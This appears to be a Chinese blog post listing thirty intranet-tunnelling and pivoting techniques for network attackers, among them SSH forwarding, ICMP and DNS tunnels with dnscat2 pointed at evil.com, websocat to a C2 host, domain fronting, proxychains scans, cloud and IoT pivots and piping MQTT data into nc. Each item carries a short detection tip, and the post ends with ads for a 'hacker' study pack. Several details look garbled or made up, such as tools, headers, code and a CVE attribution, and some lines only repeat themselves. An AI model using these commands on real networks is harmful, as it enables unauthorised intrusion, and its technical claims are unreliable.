实战中内网穿透的30种打法,从零基础到精通,收藏这些就够了!


还在苦恼内网穿透?别OUT了!在网络攻防的世界里,内网穿透可是个香饽饽,谁掌握了它,谁就能在战场上横着走!今天,咱就来扒一扒网络安全圈内网穿透的30种骚操作,从协议滥用、云原生到IoT设备,让你一次性看个够,看完直呼“内行”!文末还有企业级防御方案,记得看到最后哦!


一、协议隧道技术:听说你会伪装?安排!(8种)

1. SSH动态端口转发:听说你想搞事情?Socks5伺候!

原理:这玩意儿就像个秘密通道,用加密的Socks5代理,神不知鬼不觉。

ssh -D 1080 -p 2222 user@jump_host -Nf

检测:盯紧那些非标准端口的SSH长连接,八成有问题!

2. ICMP隐蔽隧道:Ping一下,你就暴露了!

工具:PingTunnel,顾名思义,就是用Ping来搞事情。

ptunnel -p 1.1.1.1 -lp 9001 -da 10.10.10.2 -dp 3389

特征:注意那些ICMP包,如果载荷长度超过64字节,那绝对是“超重”了!

3. DNS TXT隧道:域名解析也能玩出花?

实施

dnscat2 --dns domain=evil.com --secret=key --max-length=255

防御:限制TXT记录查询频率,别让它刷屏!

4. HTTP分片流隧道:切,不就是分个片儿吗?

技术点

  • • 用Transfer-Encoding: chunked分片传输,就像把大象装冰箱,分三步!

  • • 伪装Content-Type为image/jpeg,假装自己是张图片,迷惑你!

    检测:HTTP头和载荷类型对不上?果断拉响警报!

5. RDP网关中间人穿透:偷梁换柱,狸猫换太子!

手法

  1. 1. 劫持RDP Gateway服务,控制大门!

  2. 2. 修改TargetAddress参数,把会话重定向到你的地盘!

    工具:rdp-tunnel,一键搞定!

6. SMTP邮件路由穿透:发个邮件也能搞渗透?

步骤

  1. 1. 控制内部Exchange服务器,拿下邮件服务器!

  2. 2. 构造特殊邮件头,实现流量转发,指哪打哪:

X-Proxy: http://attacker.com:8080

7. WebSocket SSL隧道:加密通道,安全又刺激!

实现

websocat -E wss://c2.server.com tcp-listen:0.0.0.0:443

检测:SSL证书指纹异常,肯定不是啥正经网站!

8. QUIC协议穿透:UDP才是王道!

优势

  • • 基于UDP绕过传统防火墙检测,防火墙:我太难了!

  • • 0-RTT快速重连特性,速度就是生命!

    工具:quic-tunnel,玩转QUIC!


二、代理转发体系:乾坤大挪移,移形换影!(6种)

9. Socks5多级跳板链:套娃式代理,找到我算你赢!

proxychains4 -q nmap -sT -Pn 10.10.10.0/24

防御:出口流量协议白名单,只允许特定协议通过!

10. SSH反向端口转发:你以为我是跳板?其实我是...

ssh -R 0.0.0.0:3306:localhost:3306 [email protected]

检测:服务器监听非常见端口,肯定有猫腻!

11. Ngrok穿透内网服务:简单粗暴,一键穿透!

配置

tunnels:   web:     proto:http     addr:8080     subdomain:internal

特征:*.ngrok.io域名访问,看到这个域名就要小心了!

12. Frp多协议转发:功能强大,协议任你选!

架构

[frpc] <-> [frps] <-> [Attacker]

隐蔽性:使用STCP模式避免暴露端口,更加隐蔽!

13. 基于CDN的HTTPS穿透:CDN也能搞事情?

步骤

  1. 1. 在Cloudflare Workers部署代理脚本,把CDN变成你的代理!

  2. 2. 利用Workers KV存储加密隧道配置,安全又可靠!

    检测:CDN回源IP异常,肯定有问题!

14. 域前置技术(Domain Fronting):瞒天过海,暗度陈仓!

实现

Host: google.com X-Forwarded-Host: evil.com

防御:禁用SNI代理服务,不给它机会!


三、云原生穿透:玩转云,才能玩转未来!(5种)

15. 云函数反向代理:Serverless也能搞渗透?

流程

  1. 1. 创建AWS Lambda函数,创建一个云函数!

  2. 2. 绑定API Gateway作为入口,让云函数有个入口!

  3. 3. 通过Event参数传递加密指令,悄悄传递指令!

    防御:限制云函数出站流量,别让它乱跑!

16. 容器Sidecar流量劫持:偷梁换柱,容器也中招!

手法

  1. 1. 篡改K8s Pod的iptables规则,修改容器的网络规则!

  2. 2. 将流量重定向到恶意Sidecar容器,把流量导向坏人!

    检测:容器网络策略基线监控,时刻关注容器的网络!

17. 服务网格穿透(Istio):服务网格也危险?

利用

  • • 修改VirtualService路由规则,改变流量走向!

  • • 注入恶意Envoy Filter,插入恶意代码!

    工具:meshtunnel,专门搞服务网格的!

18. 云数据库穿透:数据库也逃不掉?

案例

  • • 利用MongoDB Atlas VPC Peering,连接到数据库!

  • • 通过Stitch Functions建立通道,建立秘密通道!

    防御:启用数据库网络隔离,保护数据库!

19. 云存储桶穿透:存储桶也能穿透?

步骤

  1. 1. 创建AWS S3静态网站,创建一个静态网站!

  2. 2. 利用JavaScript发起反向连接,从静态网站发起连接!

    检测:存储桶跨域策略审计,检查存储桶的策略!


四、高级渗透战术:骚操作,秀翻天!(11种)

20. 打印机协议内存驻留:万物皆可穿透?打印机也不放过!

利用

  • • PJL语言执行系统命令,让打印机执行命令!

  • • 通过LPD协议回传数据,把数据传回来!

    工具:PRET,专门搞打印机的!

21. 工控Modbus TCP隧道:工业控制系统也危险!

特征

  • • 使用功能码16(写多寄存器)传输数据,用特殊的功能码传输数据!

  • • 伪造PLC设备标识符,伪装成PLC设备!

    检测:工业协议深度解析,深入分析工业协议!

22. 虚拟化平台VNIC逃逸:逃出生天,虚拟化平台也危险!

手法

  • • VMware ESXi vSwitch策略绕过,绕过虚拟交换机的策略!

  • • Hyper-V虚拟网卡混杂模式滥用,滥用虚拟网卡的混杂模式!

    CVE:CVE-2021-21974,这是一个漏洞编号!

23. 智能家居MQTT代理穿透:智能家居变“智障”?

配置

mosquitto_sub -t 'home/#' -h broker.example.com | nc 10.1.1.100 22

防御:MQTT TLS双向认证,加强MQTT的安全性!

24. 无线Mesh网络跨VLAN渗透:无线网络也危险?

工具

  • • mesh-tunneler,专门搞无线Mesh网络的!

  • • 利用OLSR协议漏洞,利用OLSR协议的漏洞!

    检测:无线频谱行为分析,分析无线频谱的行为!

25. 区块链P2P网络桥接:区块链也逃不掉?

实现

  1. 1. 创建恶意以太坊节点,创建一个恶意的以太坊节点!

  2. 2. 通过devp2p协议建立隧道,通过devp2p协议建立隧道!

    特征:异常ENR记录传播,ENR记录传播异常!

26. 邮件客户端穿透(Outlook):邮件客户端也危险?

利用

  • • 宏代码调用WinHTTP对象,用宏代码调用WinHTTP对象!

  • • 通过邮件规则自动转发,通过邮件规则自动转发!

    检测:OLE对象行为监控,监控OLE对象的行为!

27. 浏览器WebRTC穿透:浏览器也危险?

代码

const pc = newRTCPeerConnection(); pc.createDataChannel("tunnel");

防御:禁用STUN服务,禁用STUN服务!

28. 虚拟货币矿池穿透:矿池也危险?

手法

  • • 伪造Stratum协议消息,伪造Stratum协议消息!

  • • 利用矿机固件后门,利用矿机固件后门!

    工具:miner-proxy,专门搞矿池的!

29. 生物识别设备穿透:生物识别也危险?

案例

  • • 指纹考勤机TCP 4370端口转发,指纹考勤机也中招!

  • • 人脸识别终端RTSP流重定向,人脸识别终端也中招!

    检测:生物设备协议白名单,只允许特定的生物设备协议!

30. 0day漏洞定制化穿透:终极武器,0day漏洞!

特征

  • • 结合目标系统特性开发专用隧道工具,定制化攻击!

  • • 利用未公开的协议解析漏洞,利用未公开的漏洞!

    防御:内存保护技术(ASLR/DEP),加强内存保护!


五、防御体系五层架构:打造铜墙铁壁,守护网络安全!

    1. 网络层
  • • 微分段策略(NSX/Calico),把网络分成小块,方便管理!

  • • 动态端口随机化,让端口变化莫测!

    1. 主机层
  • • 系统调用审计(eBPF),监控系统调用!

  • • 容器镜像签名验证,验证容器镜像的签名!

    1. 应用层
  • • 协议白名单(DPI),只允许特定的协议!

  • • TLS客户端证书认证,验证客户端的证书!

    1. 云原生层
  • • 服务网格mTLS,服务网格的mTLS认证!

  • • 云API操作审计,审计云API操作!

    1. 物理层
  • • 工业网络物理隔离,物理隔离工业网络!

  • • 无线频谱行为分析,分析无线频谱的行为!

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************